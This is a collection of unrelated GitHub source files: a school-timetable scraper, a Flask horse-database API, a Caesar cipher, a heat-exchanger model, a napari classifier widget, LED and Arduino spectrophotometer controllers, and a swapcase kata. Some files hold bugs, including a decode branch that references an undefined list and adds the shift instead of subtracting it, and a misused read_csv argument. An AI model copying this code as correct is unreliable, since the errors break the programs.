edupage_api.people import EduTeacher, People\n\n\nclass Action(str, Enum):\n ADDITION = \"add\"\n CHANGE = \"change\"\n DELETION = \"remove\"\n\n @staticmethod\n def parse(string: str) -> Optional[Action]:\n return ModuleHelper.parse_enum(string, Action)\n\n\n@dataclass\nclass TimetableChange:\n change_class: str\n lesson_n: int\n title: str\n action: Union[Action, tuple[int, int]]\n\n\nclass Substitution(Module):\n def __get_substitution_data(self, date: date) -> str:\n url = (f\"https://{self.edupage.subdomain}.edupage.org/substitution/server/viewer.js\"\n \"?__func=getSubstViewerDayDataHtml\")\n\n data = {\n \"__args\": [\n None,\n {\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"mode\": \"classes\"\n }\n ],\n \"__gsh\": self.edupage.gsec_hash\n }\n\n response = self.edupage.session.post(url, json=data).content.decode()\n response = json.loads(response)\n\n if response.get(\"reload\"):\n raise ExpiredSessionException(\"Invalid gsec hash! \"\n \"(Expired session, try logging in again!)\")\n\n return response.get(\"r\")\n\n @ModuleHelper.logged_in\n def get_missing_teachers(self, date: date) -> Optional[list[EduTeacher]]:\n html = self.__get_substitution_data(date)\n missing_teachers_string = (html.split(\"<span class=\\\"print-font-resizable\\\">\")[1]\n .split(\"</span>\")[0])\n\n if not missing_teachers_string:\n return None\n\n _title, missing_teachers = missing_teachers_string.split(\": \")\n\n all_teachers = People(self.edupage).get_teachers()\n\n missing_teachers = [item for sublist in [\n (t.strip()\n .split(\" (\")[0]).split(\" + \")\n for t in missing_teachers.split(\", \")\n ] for item in sublist]\n\n try:\n missing_teachers = [\n list(filter(lambda x: x.name == t, all_teachers))[0]\n for t in missing_teachers\n ]\n except IndexError:\n raise InvalidTeacherException(\"Invalid teacher in substitution! \"\n \"(The teacher is no longer frequenting this school)\")\n\n return missing_teachers\n\n @ModuleHelper.logged_in\n def get_timetable_changes(self, date: date) -> Optional[list[TimetableChange]]:\n html = self.__get_substitution_data(date)\n\n class_delim = (\"</div><div class=\\\"section print-nobreak\\\">\"\n \"<div class=\\\"header\\\"><span class=\\\"print-font-resizable\\\">\")\n changes_by_class_dirty = html.split(class_delim)[1:]\n\n if not changes_by_class_dirty:\n return None\n\n footer_delim = (\"<div style=\\\"text-align:center;font-size:12px\\\">\"\n \"<a href=\\\"https://www.asctimetables.com\\\" target=\\\"_blank\\\">\"\n \"www.asctimetables.com</a> -\")\n changes_by_class_dirty[-1] = changes_by_class_dirty[-1].split(footer_delim)[0]\n\n changes = [\n (x.replace(\"</div>\", \"\")\n .replace(\"<div class=\\\"period\\\">\", \"\")\n .replace(\"<span class=\\\"print-font-resizable\\\">\", \"\")\n .replace(\"<div class=\\\"info\\\">\", \"\"))\n for x in changes_by_class_dirty\n ]\n\n lesson_changes = []\n for class_changes in changes:\n class_changes_data = class_changes.split(\"</span><div class=\\\"rows\\\">\")\n change_class = class_changes_data[0]\n\n class_changes_rows = class_changes_data[1].split(\"<div class=\\\"row \")[1:]\n\n for change in class_changes_rows:\n change = change.replace(\"\\\">\", \"</span>\")\n action, lesson_n, title = change.split(\"</span>\", 3)[:-1]\n\n if \"<img src=\" in title:\n title = title.split(\">\")[1]\n\n action = Action.parse(action)\n\n if \"-\" in lesson_n:\n lesson_from, lesson_to = lesson_n.split(\" - \")\n lesson_n = (ModuleHelper.parse_int(lesson_from),\n ModuleHelper.parse_int(lesson_to))\n else:\n lesson_n = ModuleHelper.parse_int(lesson_n)\n\n lesson_change = TimetableChange(change_class, lesson_n, title, action)\n lesson_changes.append(lesson_change)\n\n return lesson_changes\n","repo_name":"ivanhrabcak/edupage-api","sub_path":"edupage_api/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"48"} +{"seq_id":"38046244811","text":"from flask import Flask, jsonify, request, abort\nfrom horsesDAO import horseDAO\nimport betfairApi as bf\n\napp = Flask(__name__, static_url_path='', static_folder='../html/')\n\n# # default to login page\n# @app.route('/')\n# def index(self):\n# return redirect(\"127.0.0.1:5000/login.html\"))\n\n# upcoming racemeetings\n@app.route('/events')\ndef getRaceMeetings():\n return jsonify(bf.getEvents())\n\n# upcoming races @ upcoming race meetings\n@app.route('/upcraces')\ndef getRacesMeetingDet():\n return jsonify(bf.getUpcRaces())\n\n# horses in the database\n@app.route('/horses')\ndef getAll():\n results = horseDAO.getAll()\n return jsonify(results)\n\n#curl \"http://127.0.0.1:5000/horses/1\"\n@app.route('/horses/<int:id>')\ndef findById(id):\n foundHorse = horseDAO.findByID(id)\n return jsonify(foundHorse)\n\n#curl -i -H \"Accept: application/json\" -H \"Content-Type: application/json\" -X POST -d '{}' http://127.0.0.1:5000/horses\n@app.route('/horses', methods=['POST'])\ndef create():\n #global nextId\n if not request.json:\n abort(400)\n # other checking that properly formatted\n horse = {\n \"id\": request.json['id'],\n \"Name\": request.json['Name'],\n \"Age\": request.json['Age'],\n \"Sex\": request.json['Sex'],\n \"Owner\": request.json['Owner'],\n \"Trainer\": request.json['Trainer'],\n \"Form\": request.json['Form']\n }\n values =(horse['id'],horse['Name'],horse['Age'],horse['Sex'],horse['Owner'],horse['Trainer'],horse['Form'])\n horseDAO.create(values)\n return jsonify(horse)\n\n#curl -i -H \"Accept: application/json\" -H \"Content-Type: application/json\" -X PUT -d '{\"id\":}' http://127.0.0.1:5000/horses/3\n@app.route('/horses/<int:id>', methods=['PUT'])\ndef update(id):\n foundHorse = horseDAO.findByID(id)\n if not foundHorse:\n abort(404)\n if not request.json:\n abort(400)\n reqJson = request.json\n if 'Name' in reqJson:\n foundHorse['Name']= reqJson['Name']\n if 'Age' in reqJson:\n foundHorse['Age']= reqJson['Age']\n if 'Sex' in reqJson:\n foundHorse['Sex']= reqJson['Sex']\n if 'Owner' in reqJson:\n foundHorse['Owner']= reqJson['Owner']\n if 'Trainer' in reqJson:\n foundHorse['Trainer']= reqJson['Trainer']\n if 'Form' in reqJson:\n foundHorse['Form']= reqJson['Form']\n values = (foundHorse['Name'],foundHorse['Age'],foundHorse['Sex'],foundHorse['Owner'],foundHorse['Trainer'],foundHorse['Form'],foundHorse['id'])\n horseDAO.update(values)\n return jsonify(foundHorse)\n\n@app.route('/horses/<int:id>', methods=['DELETE'])\ndef delete(id):\n horseDAO.delete(id)\n return jsonify({\"deleted successfully\":True})\n\nif __name__ == '__main__' :\n app.run(debug= True)\n","repo_name":"jobur123/drProjectDec2019","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20575426494","text":"from day8_ceasar_art import logo\n\nprint(logo)\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',\n 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\ntext = input(\"Type your message:\\n\").lower()\nshift = int(input(\"Type the shift number:\\n\"))\n\n\ndef ceaser(direction, text, shift):\n if direction == \"encode\":\n enc_message = []\n for position in text:\n dex_out = (alphabet.index(position) + shift)\n if dex_out > 25:\n dex_out -= 26\n let_out = alphabet[dex_out]\n enc_message.append(let_out)\n print(\"The encrypted message is \" + \"\".join(enc_message))\n elif direction == \"decode\":\n dec_message = []\n for position in text:\n dex_out = (alphabet.index(position) + shift)\n if dex_out > 25:\n dex_out -= 26\n let_out = alphabet[dex_out]\n enc_message.append(let_out)\n print(\"The decrypted message is \" + \"\".join(dec_message))\n else:\n print(f\"The entry needs to be encode or decode not {direction}\")\n exit()\n\n\nceaser(direction, text, shift)\n","repo_name":"lahman1/programming","sub_path":"100_days_class/python/day1-10/day8_ceasar_cipher.py","file_name":"day8_ceasar_cipher.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27231610852","text":"from numpy import nan\n\nfrom rtctools_heat_network.pycml import Variable\nfrom rtctools_heat_network.pycml.component_library.heat._internal import BaseAsset\nfrom rtctools_heat_network.pycml.component_library.heat.heat_four_port import HeatFourPort\n\n\nclass HeatExchanger(HeatFourPort, BaseAsset):\n \"\"\"\n The heat exchanger component is used to model the exchange of thermal power between two\n hydraulically decoupled systems. A constant efficiency is used to model heat losses and a\n maximum power is set on the primary side to model physical constraints on the amount of heat\n transfer.\n\n The heat to discharge constraints are set in the HeatMixin. The primary side is modelled as a\n demand, meaning it consumes energy from the primary network and gives it to the secondary side,\n where the secondary side acts like a source to the secondary network. This also means that heat\n can only flow from primary to secondary.\n\n To avoid unphysical heat transfer the HeatMixin sets constraints on the temperatures on both\n sides in the case of varying temperature. We also allow a heat_exchanger to be disabled on\n certain time-steps to then allow these temperature constraints to be also disabled.\n \"\"\"\n\n def __init__(self, name, **modifiers):\n super().__init__(\n name,\n **self.merge_modifiers(\n dict(),\n modifiers,\n ),\n )\n\n self.component_type = \"heat_exchanger\"\n self.efficiency = nan\n\n self.nominal = (\n self.Secondary.Q_nominal * self.Secondary.rho * self.Secondary.cp * self.Secondary.dT\n )\n\n self.price = nan\n\n # Assumption: heat in/out and added is nonnegative\n\n self.add_variable(Variable, \"Primary_heat\", min=0.0)\n self.add_variable(Variable, \"Secondary_heat\", min=0.0)\n self.add_variable(Variable, \"Heat_flow\", nominal=self.nominal)\n self.add_variable(Variable, \"dH_prim\")\n self.add_variable(Variable, \"dH_sec\")\n\n # Hydraulically decoupled so Heads remain the same\n self.add_equation(self.dH_prim - (self.Primary.HeatOut.H - self.Primary.HeatIn.H))\n self.add_equation(self.dH_sec - (self.Secondary.HeatOut.H - self.Secondary.HeatIn.H))\n\n self.add_equation(\n ((self.Primary_heat * self.efficiency - self.Secondary_heat) / self.nominal)\n )\n\n self.add_equation(\n (\n (self.Primary_heat - (self.Primary.HeatIn.Heat - self.Primary.HeatOut.Heat))\n / self.nominal\n )\n )\n self.add_equation(\n (\n (self.Secondary_heat - (self.Secondary.HeatOut.Heat - self.Secondary.HeatIn.Heat))\n / self.nominal\n )\n )\n self.add_equation((self.Heat_flow - self.Secondary_heat) / self.nominal)\n","repo_name":"Nieuwe-Warmte-Nu/rtc-tools-heat-network","sub_path":"src/rtctools_heat_network/pycml/component_library/heat/heat_exchanger.py","file_name":"heat_exchanger.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25152044477","text":"from qtpy.QtWidgets import (QVBoxLayout, QPushButton, QWidget,\n QLabel, QFileDialog, QListWidget, QAbstractItemView,\n QCheckBox, QLineEdit, QSpinBox, QDoubleSpinBox,QGridLayout)\nfrom qtpy.QtCore import Qt\nimport numpy as np\nimport skimage\nfrom pathlib import Path\n\nfrom ..classifier import Classifier\nfrom napari_convpaint.conv_paint_utils import Hookmodel, Classifier\nfrom napari_convpaint.conv_paint_utils import (get_features_current_layers,\n train_classifier, predict_image)\n\nclass MLWidget(QWidget):\n \"\"\"Widget for ml pixel classification. Parent should have :\n - an attribute called rgb_names, specifying the channels to use.\"\"\"\n\n def __init__(self, parent, napari_viewer):\n super().__init__(parent)\n\n self.parent = parent\n self.viewer = napari_viewer\n self.pixclass = None\n self.classifier = None\n self.data = None\n\n self.main_layout = QGridLayout()\n self.setLayout(self.main_layout)\n \n self.btn_add_annotation_layer = QPushButton(\"Add annotation layer\")\n self.main_layout.addWidget(self.btn_add_annotation_layer, 0, 0, 1, 2)\n self.check_smoothing = QCheckBox('Gaussian smoothing')\n self.check_smoothing.setChecked(False)\n self.main_layout.addWidget(self.check_smoothing, 1, 0, 1, 1)\n self.spin_gaussian_smoothing = QDoubleSpinBox()\n self.spin_gaussian_smoothing.setRange(0.1, 10)\n self.spin_gaussian_smoothing.setSingleStep(0.1)\n self.spin_gaussian_smoothing.setValue(3)\n self.main_layout.addWidget(self.spin_gaussian_smoothing, 1, 1, 1, 1)\n self.spin_downscale = QSpinBox()\n self.spin_downscale.setRange(1, 10)\n self.spin_downscale.setSingleStep(1)\n self.spin_downscale.setValue(4)\n self.main_layout.addWidget(QLabel('Downscale factor'), 2, 0, 1, 1)\n self.main_layout.addWidget(self.spin_downscale, 2, 1, 1, 1)\n self.btn_reset_mlmodel = QPushButton(\"(Re-)train pixel classifier\")\n self.main_layout.addWidget(self.btn_reset_mlmodel, 3, 0, 1, 2)\n self.btn_ml_mask = QPushButton(\"Generate mask\")\n self.main_layout.addWidget(self.btn_ml_mask, 4, 0, 1, 2)\n self.btn_save_model = QPushButton(\"Save model\")\n self.main_layout.addWidget(self.btn_save_model, 5, 0, 1, 2)\n self.btn_load_model = QPushButton(\"Load model\")\n self.main_layout.addWidget(self.btn_load_model, 6, 0, 1, 2)\n\n self.add_connections()\n\n def add_connections(self):\n\n self.btn_add_annotation_layer.clicked.connect(self._on_click_add_annotation_layer)\n self.btn_reset_mlmodel.clicked.connect(self._on_initialize_model)\n self.btn_ml_mask.clicked.connect(self._on_click_ml_mask)\n self.btn_save_model.clicked.connect(self._on_click_save_model)\n self.btn_load_model.clicked.connect(self._on_click_load_model)\n\n\n def _on_click_add_annotation_layer(self):\n \"\"\"Add annotation layer to viewer\"\"\"\n\n if 'annotations' in self.viewer.layers:\n print('Annotations layer already exists')\n return\n self.viewer.add_labels(np.zeros_like(self.viewer.layers['mask'].data), name='annotations', opacity=0.5)\n\n def _on_initialize_model(self, event=None):\n\n if 'annotations' not in self.viewer.layers:\n raise ValueError('No annotation layer found')\n \n reduce_fact = self.spin_downscale.value()\n self.data = self.get_data()\n annotations = self.viewer.layers['annotations'].data[::reduce_fact,::reduce_fact]\n \n if self.classifier is None:\n self.classifier = Classifier()\n\n features, targets = get_features_current_layers(\n model=self.classifier.model, image=self.data, annotations=annotations,\n scalings=self.classifier.param.scalings,\n order=self.classifier.param.order, use_min_features=self.classifier.param.use_min_features)\n self.classifier.random_forest = train_classifier(features, targets)\n\n def get_data(self):\n\n reduce_fact = self.spin_downscale.value()\n #data = self.viewer.layers['imcube'].data\n data = self.parent.rgb_widget.get_current_rgb_cube()\n\n if len(data) !=3:\n raise ValueError('Only three channel images are supported')\n \n if self.check_smoothing.isChecked():\n data = skimage.filters.gaussian(data, sigma=self.spin_gaussian_smoothing.value(), preserve_range=True)[:, ::4, ::4]\n else:\n data = data[:, ::reduce_fact, ::reduce_fact]\n return data.mean(axis=0)\n\n def _on_click_ml_mask(self):\n\n #if 'annotations' not in self.viewer.layers:\n # raise ValueError('No annotation layer found')\n \n if self.classifier is None:\n self._on_initialize_model()\n \n if self.data is None:\n self.data = self.get_data()\n\n pred = predict_image(\n self.data, self.classifier.model,\n self.classifier.random_forest,\n self.classifier.param.scalings,\n self.classifier.param.order, self.classifier.param.use_min_features)\n \n pred = (pred == 1).astype(np.uint8)\n predict_upscale = skimage.transform.resize(\n pred, self.viewer.layers['mask'].data.shape, order=0)\n if 'ml-mask' in self.viewer.layers:\n self.viewer.layers['ml-mask'].data = predict_upscale\n else:\n self.viewer.add_labels((predict_upscale==1).astype(np.uint8), name='ml-mask')\n\n def _on_click_save_model(self, event=None, save_path=None):\n \n if save_path is None:\n dialog = QFileDialog()\n save_path, _ = dialog.getSaveFileName(self, \"Save model\", None, \"JOBLIB (*.joblib)\")\n save_path = Path(save_path)\n\n self.classifier.save_classifier(save_path)\n\n def _on_click_load_model(self, event=None, load_path=None):\n\n self.classifier = Classifier()\n \n if load_path is None:\n dialog = QFileDialog()\n load_path, _ = dialog.getOpenFileName(self, \"Load model\", None, \"JOBLIB (*.joblib)\")\n load_path = Path(load_path)\n\n self.classifier.load_model(load_path)\n","repo_name":"guiwitz/napari-sediment","sub_path":"src/napari_sediment/widgets/mlwidget.py","file_name":"mlwidget.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39886105361","text":"'''\nMyRoboPW: Test for 2x RGB LEDs\nDate: 1/7/2023\nCode by: NAR\n\nAdditional Library:\n - neopixel.mpy\n'''\n\nimport time\nimport board\nimport neopixel\nimport random\n\n# Configure the setup\nPIXEL_PIN = board.GP18 # pin that the NeoPixel is connected to\nORDER = neopixel.GRB # pixel color channel order\nCOLORB = (0, 0, 255) # color to blink (Red, Green, Blue)\nCOLORR = (255, 0, 0) # color to blink (Red, Green, Blue)\nCOLORG = (0, 255, 0) # color to blink (Red, Green, Blue)\nCLEAR = (0, 0, 0) # clear (or second color)\nDELAY = 0.5 # blink rate in seconds\nnum_pixel = 2 # number of RGB LEDs\n\n# Create the NeoPixel object\npixel = neopixel.NeoPixel(PIXEL_PIN, num_pixel, brightness=0.1, pixel_order=ORDER)\n\nwhile True:\n # Blue Color\n for i in range (num_pixel):\n pixel[i] = COLORB\n time.sleep(DELAY)\n pixel[i] = CLEAR\n time.sleep(DELAY)\n # Red Color\n for j in range(num_pixel):\n pixel[j] = COLORR\n time.sleep(DELAY)\n pixel[j] = CLEAR\n time.sleep(DELAY)\n # Green Color\n for k in range (num_pixel):\n pixel[k] = COLORG\n time.sleep(DELAY)\n pixel[k] = CLEAR\n time.sleep(DELAY)\n \n time.sleep(1)\n \n # Clear the Pixels\n pixel.fill((0, 0, 0))\n \n # Random Color for ALL Pixels\n for i in range (10):\n pixel.fill((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))\n pixel.show()\n time.sleep(DELAY)\n\n time.sleep(1)\n \n # Clear the Pixels\n pixel.fill((0, 0, 0))\n","repo_name":"mymadi/MyRoboPicoW","sub_path":"04_MyRPW_RGBLEDs/04MR_RGBLEDs.py","file_name":"04MR_RGBLEDs.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71392239187","text":"\r\n#-------------------------------------------------------------------------------\r\n# UAMonitor: A controler for a homemade spectrophotometer creaded for\r\n# iGEM Competition 2022 (beta v0.1)\r\n# Silva Tovar Mauricio \r\n# Reyes Morales Laura Mariana \r\n# Carrasco González Mauricio \r\n# Hernandez Monzalvo Alicia Jacqueline\r\n# October, 2022\r\n# iGEM UAM\r\n#-------------------------------------------------------------------------------\r\n\r\n#Abilitate if you use jupiterlab\r\n#%matplotlib widget\r\n#Paketing used\r\nimport tkinter\r\nimport serial \r\nimport time\r\nimport os\r\nimport re\r\nimport threading\r\nimport multiprocessing\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom datetime import date\r\nfrom datetime import datetime\r\nfrom tkinter import filedialog\r\n\r\n# Implement the default Matplotlib key bindings.\r\nfrom matplotlib.backend_bases import key_press_handler\r\nfrom matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.pyplot import *\r\nimport matplotlib.animation as animation\r\nfrom matplotlib import backend_bases\r\n\r\n\r\n#Inicial conditions\r\nledFlu=0\r\nledOD=0\r\n\r\n\r\n\r\n\r\n\r\n#Create a Tkinterface with our icon and title\r\nroot = tkinter.Tk()\r\nroot.wm_title(\"UAMonitor\")\r\n\r\nif \"nt\" == os.name:\r\n root.wm_iconbitmap(bitmap = \"iGEM.ico\")\r\nelse:\r\n root.wm_iconbitmap(bitmap = \"iGEM.xbm\")\r\n\r\n#root['background']='yellow'\r\n\r\n#imgicon = PhotoImage(file=os.path.join(Documents/Mauricio/iGEM/Arduino/Espectro_Foto/sketch_sep28a/iGEM.ico,'iGEM.ico'))\r\n#root.tk.call('wm', 'iconphoto', root._w, imgicon) \r\n\r\n\r\n\"\"\"\r\nFrame = tkinter.Frame() #Frame creation\r\nFrame.config(cursor=\"heart\")\r\nFrame.config(width=\"150\", height=\"150\")\r\nFrame.pack(fill=\"both\")\r\nFrame.config(bg=\"blue\")\r\nFrame.pack(side=\"bottom\")\r\n\"\"\"\r\n\r\n# initialize the data arrays \r\ngDATA = []\r\ngDATA.append([0])\r\ngDATA.append([0])\r\ngDATA.append([0])\r\n\r\n# create a figure with two subplots\r\nfig, (ax1, ax2) = subplots(1,2)\r\n\r\n#Add the figure to the Tkinterface\r\ncanvas = FigureCanvasTkAgg(fig, master=root) # A tk.DrawingArea.\r\ncanvas.draw()\r\ncanvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\r\n\r\n#Configure Fluorescence plot\r\nax1.set_title('Fluorescence')\r\nax1.grid()\r\nax1.set_xlim((0,100))\r\nax1.set_ylim((-1,100))\r\n\r\n#Configure Optical Density plot\r\nax2.set_title('Optical Density')\r\nax2.grid()\r\nax2.set_xlim((0,100))\r\nax2.set_ylim((-1,100))\r\n\r\n\r\n# intialize two line objects (one in each axes)\r\nline1, = ax1.plot(gDATA[0], gDATA[1], lw=2, color='green')\r\nline2, = ax2.plot(gDATA[0], gDATA[2], lw=2, color='orange')\r\nline = [line1, line2]\r\n\r\n\r\n\r\ndef update_line(num,line,data):\r\n \r\n# axis limits checking. Same as before, just for both axes\r\n for ax in [ax1, ax2]:\r\n xmin, xmax = ax.get_xlim()\r\n if max(data[0])>= xmax:\r\n ax.set_xlim(xmin, 1.5*xmax)\r\n ax.figure.canvas.draw()\r\n # update the data of both line objects\r\n line[0].set_data(data[0], data[1])\r\n line[1].set_data(data[0], data[2])\r\n\r\n return line\r\n\r\nani = animation.FuncAnimation(fig, update_line, blit=True, fargs=(line, gDATA),interval=100, repeat=False)\r\n\r\n\r\n\r\n\r\n#In the next part we remove the button configure subplot because cause a warning message.\r\n# mpl.rcParams['toolbar'] = 'None'\r\nbackend_bases.NavigationToolbar2.toolitems = (\r\n ('Home', 'Reset original view', 'home', 'home'),\r\n ('Back', 'Back to previous view', 'back', 'back'),\r\n ('Forward', 'Forward to next view', 'forward', 'forward'),\r\n (None, None, None, None),\r\n ('Pan', 'Pan axes with left mouse, zoom with right', 'move', 'pan'),\r\n ('Zoom', 'Zoom to rectangle', 'zoom_to_rect', 'zoom'),\r\n (None, None, None, None),\r\n ('Save', 'Save the figure', 'filesave', 'save_figure'),\r\n )\r\n\r\n#Add a Toolbar to control the figure\r\ntoolbar = NavigationToolbar2Tk(canvas, root)\r\ntoolbar.update()\r\ncanvas.get_tk_widget().pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\r\n\r\n\"\"\"\r\n#For some reason this funtion print if you preesed a key\r\ndef on_key_press(event):\r\n print(\"you pressed {}\".format(event.key))\r\n key_press_handler(event, canvas, toolbar)\r\n\r\n\r\ncanvas.mpl_connect(\"key_press_event\", on_key_press)\r\n\"\"\"\r\n\r\ndef timer(condition):\r\n global tim\r\n tim=0\r\n while True:\r\n time.sleep(0.1)\r\n tim = tim + 0.1\r\n if Mode != condition:\r\n break\r\n return\r\n\r\n\r\ndef GetData(gDATA,condition,state):\r\n\r\n global format\r\n #Time \r\n if condition != 'M' or state != 'O':\r\n format = datetime.now().strftime('%d-%m-%Y, %H;%M;%S')\r\n \r\n global vFlu\r\n vFlu=0\r\n global vOD\r\n vOD=0\r\n\r\n gDATA[0]=[0]\r\n gDATA[1]=[0]\r\n gDATA[2]=[0]\r\n\r\n \r\n #datAR =serialArduino.readline().decode('ascii') \r\n datAR =serialArduino.readline().decode('ascii').strip()\r\n time.sleep(0.5)\r\n \r\n if condition == 'M' and state == 'O':\r\n time.sleep(1.0)\r\n\r\n format_before = '0'\r\n \r\n while True:\r\n\r\n \r\n if datAR:\r\n pos=datAR.index(\",\")\r\n if state == 'F':\r\n vFlu=int(datAR[:pos])\r\n if state == 'O':\r\n vOD=int(datAR[pos+1:])\r\n gDATA[0].append(tim)\r\n gDATA[1].append(vFlu)\r\n gDATA[2].append(vOD)\r\n\r\n saves = pd.DataFrame(gDATA,index=['Time', 'Fluorecense','Optical Density']).transpose()\r\n saves.to_csv('data '+str(format)+'('+str(condition)+').csv', index=False)\r\n if len(gDATA[0]) > 200:\r\n if condition != 'M' or state != 'O':\r\n if format_before != '0':\r\n data = pd.read_csv('data '+str(format)+'('+str(condition)+').csv', index=False) \r\n updated_data = pd.read_csv('data '+str(format)+'.csv') \r\n final_dataframe = pd.concat([data, updated_data]).drop_duplicates(subset='Time', keep='last').reset_index(drop=True) \r\n final_dataframe.to_csv('data '+str(format)+'.csv', index=False)\r\n os.remove('data '+str(format_before)+'.csv')\r\n i = 0\r\n gDATA[0]=[]\r\n gDATA[1]=[]\r\n gDATA[2]=[]\r\n format_before = format\r\n format=datetime.now().strftime('%d-%m-%Y, %H;%M;%S')\r\n datAR =serialArduino.readline().decode('ascii').strip() \r\n time.sleep(1) \r\n if Mode != condition:\r\n break\r\n return\r\n\r\ndef Monitor_loop(condition):\r\n while True:\r\n Assing_LED(1,0)\r\n time.sleep(1)\r\n Assing_LED(0,1)\r\n time.sleep(1)\r\n print(\"Sí\")\r\n if condition != 'M':\r\n break\r\n return\r\n\r\n#This funtion control the state of the LEDs\r\ndef Assing_LED(ledFlu,ledOD):\r\n dat = str(ledFlu) + \",\"+ str(ledOD)\r\n serialArduino.write(dat.encode('ascii'))\r\n return\r\n \r\ndef _stop():\r\n if serialArduino != None:\r\n Assing_LED(0,0)\r\n global Mode\r\n Mode = 'X'\r\n return \r\n\r\n\r\ndef _connect():\r\n global serialArduino\r\n serialArduino = serial.Serial(\"COM2\",9600,timeout=1.0)\r\n if serialArduino != None:\r\n tkinter.messagebox.showinfo(\"Information Window\", \"Successful connection with Arduino\")\r\n return \r\n\r\ndef _quit():\r\n root.quit() # stops mainloop\r\n root.destroy() # this is necessary on Windows to\r\n _stop()\r\n serialArduino.close()\r\n return # Fatal Python Error: PyEval_RestoreThread: NULL tstate\r\n\r\ndef _save():\r\n dataFile=pd.read_csv('data '+str(format)+'('+str(Mode)+').csv')\r\n SAVING_PATH = filedialog.asksaveasfile(mode='w', defaultextension=\".csv\")\r\n dataFile.to_csv(SAVING_PATH)\r\n\r\n'''**********************\r\n* MODES MENU *\r\n************************\r\n* *\r\n* F >> Fluorence mode *\r\n* O >> OD mode *\r\n* M >> Monitor mode *\r\n* X >> Salir *\r\n* *\r\n************************'''\r\n\r\n#Definition of Fluorescence Mode \r\ndef _FLU():\r\n global Mode\r\n Mode='O'\r\n Assing_LED(1,0)\r\n Cronometer = threading.Thread(target = timer, args=('F',)) \r\n dataCollectorFLU = threading.Thread(target = GetData, args=(gDATA,'F','F',))\r\n dataCollectorFLU.start()\r\n Cronometer.start()\r\n return\r\n\r\n#Definition of Optical Density Mode\r\ndef _OD():\r\n global Mode\r\n Mode='O'\r\n Assing_LED(0,1)\r\n Cronometer = threading.Thread(target = timer, args=('O',)) \r\n dataCollectorOD = threading.Thread(target = GetData, args=(gDATA,'O','O',))\r\n dataCollectorOD.start()\r\n Cronometer.start()\r\n return\r\n\r\n#Definition of Monitor Mode\r\ndef _MON():\r\n global Mode\r\n Mode='M'\r\n Assing_LED(1,1)\r\n #loop= threading.Thread(target = Monitor_loop, args=('M',)) \r\n #loop.start()\r\n Cronometer = threading.Thread(target = timer, args=('M',)) \r\n dataCollectorMON_FLU = threading.Thread(target = GetData, args=(gDATA,'M','F',))\r\n dataCollectorMON_OD = threading.Thread(target = GetData, args=(gDATA,'M','O',))\r\n dataCollectorMON_FLU.start() \r\n dataCollectorMON_OD.start()\r\n Cronometer.start()\r\n return\r\n\r\n \r\n\r\n#Enable a button and option to quit the window\r\nqui = tkinter.Button(master=root, text=\"Quit\", command=_quit, fg=\"#E0218A\")\r\nqui.pack(side=tkinter.RIGHT)\r\n \r\n#Enable a button and option to stop mesurate\r\nsto = tkinter.Button(master=root, text=\"Stop\", command=_stop, fg=\"#E0218A\")\r\nsto.pack(side=tkinter.RIGHT)\r\n \r\n#Enable a button of the function to connect the program to Arduino \r\ncon = tkinter.Button(master=root, text=\"Connect Arduino\", command=_connect, fg=\"#E0218A\")\r\ncon.pack(side=tkinter.TOP)\r\n\r\n#Label to indicate the version\r\nlabel = tkinter.Label(root, text=\"UAMonitor beta v0.1\")\r\nlabel.pack(side=tkinter.BOTTOM, anchor=tkinter.CENTER)\r\n\r\n#Enable a button of the Monitor Mode\r\nMon = tkinter.Button(master=root, text=\"Save\", command=_save, fg=\"#E0218A\")\r\nMon.pack(side=tkinter.BOTTOM)\r\n\r\n#Enable a button of the OD Mode\r\nOD = tkinter.Button(master=root, text=\"OD Mode\", command=_OD, fg=\"#E0218A\")\r\nOD.pack(side=tkinter.LEFT)\r\n\r\n#Enable a button of the Fluorescence Mode\r\nFlu = tkinter.Button(master=root, text=\"Fluorecense Mode\", command=_FLU, fg=\"#E0218A\")\r\nFlu.pack(side=tkinter.LEFT)\r\n\r\n#Enable a button of the Monitor Mode\r\n#Mon = tkinter.Button(master=root, text=\"Monitor Mode\", command=_MON, fg=\"#E0218A\")\r\n#Mon.pack(side=tkinter.LEFT)\r\n\r\nroot.mainloop()\r\n# If you put root.destroy() here, it will cause an error if the window is closed with the window manager.\r\n","repo_name":"Rexmali/iGEM-UAM2022","sub_path":"UAMonitor(Sourse)/UAMonitor_python/UAMonitor.py","file_name":"UAMonitor.py","file_ext":"py","file_size_in_byte":10163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39624916982","text":"def swap(string_):\n \"\"\"Given a string, swap the case for each of the letters.\n e.g. CodEwArs --> cODeWaRS\"\"\"\n s = ''\n for i in string_:\n if i.isupper():\n s += i.lower()\n else:\n s += i.upper()\n return s\n\n # return string_.swapcase()\n\n\nassert swap('HelloWorld') == 'hELLOwORLD'\nassert swap('CodeWars') == 